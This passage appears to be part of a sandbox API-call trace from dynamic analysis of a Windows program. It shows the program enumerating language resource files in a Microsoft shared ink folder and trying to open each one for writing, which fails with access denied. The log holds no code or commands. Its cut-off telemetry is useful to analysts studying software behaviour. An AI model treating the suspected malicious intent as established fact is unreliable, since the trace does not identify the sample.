0x538c8 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0082.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.551] AreFileApisANSI () returned 1 [0082.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui", lpUsedDefaultChar=0x0) returned 86 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0082.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.551] AreFileApisANSI () returned 1 [0082.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0082.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x811e8 [0082.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x811e8, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 86 [0082.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.552] GetFileType (hFile=0x334) returned 0x1 [0082.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0082.552] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.552] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.552] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.553] CloseHandle (hObject=0x334) returned 1 [0082.553] AreFileApisANSI () returned 1 [0082.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0082.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81bf8 [0082.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81bf8, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 86 [0082.553] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.553] GetLastError () returned 0x5 [0082.553] GetLastError () returned 0x5 [0082.553] SetLastError (dwErrCode=0x5) [0082.553] GetLastError () returned 0x5 [0082.553] SetLastError (dwErrCode=0x5) [0082.553] GetLastError () returned 0x5 [0082.553] SetLastError (dwErrCode=0x5) [0082.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0082.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0082.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.553] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9f27a8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0082.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0082.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0082.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0082.554] AreFileApisANSI () returned 1 [0082.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", lpUsedDefaultChar=0x0) returned 80 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.555] AreFileApisANSI () returned 1 [0082.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0082.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0082.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 80 [0082.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.556] GetFileType (hFile=0x430) returned 0x1 [0082.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0082.556] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.556] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.556] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.556] CloseHandle (hObject=0x430) returned 1 [0082.556] AreFileApisANSI () returned 1 [0082.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0082.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0082.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 80 [0082.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.557] GetLastError () returned 0x5 [0082.557] GetLastError () returned 0x5 [0082.557] SetLastError (dwErrCode=0x5) [0082.557] GetLastError () returned 0x5 [0082.557] SetLastError (dwErrCode=0x5) [0082.557] GetLastError () returned 0x5 [0082.557] SetLastError (dwErrCode=0x5) [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0082.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.557] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x80b88a00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0082.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x816f0 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0082.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.558] AreFileApisANSI () returned 1 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", lpUsedDefaultChar=0x0) returned 84 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0082.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.558] AreFileApisANSI () returned 1 [0082.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0082.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5fbb8 [0082.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5fbb8, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 84 [0082.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.559] GetFileType (hFile=0x430) returned 0x1 [0082.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0082.560] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.560] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.560] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.560] CloseHandle (hObject=0x430) returned 1 [0082.560] AreFileApisANSI () returned 1 [0082.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0082.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f008 [0082.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f008, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 84 [0082.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.560] GetLastError () returned 0x5 [0082.560] GetLastError () returned 0x5 [0082.561] SetLastError (dwErrCode=0x5) [0082.561] GetLastError () returned 0x5 [0082.561] SetLastError (dwErrCode=0x5) [0082.561] GetLastError () returned 0x5 [0082.561] SetLastError (dwErrCode=0x5) [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0082.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.561] FindNextFileW (in: hFindFile=0x78750, 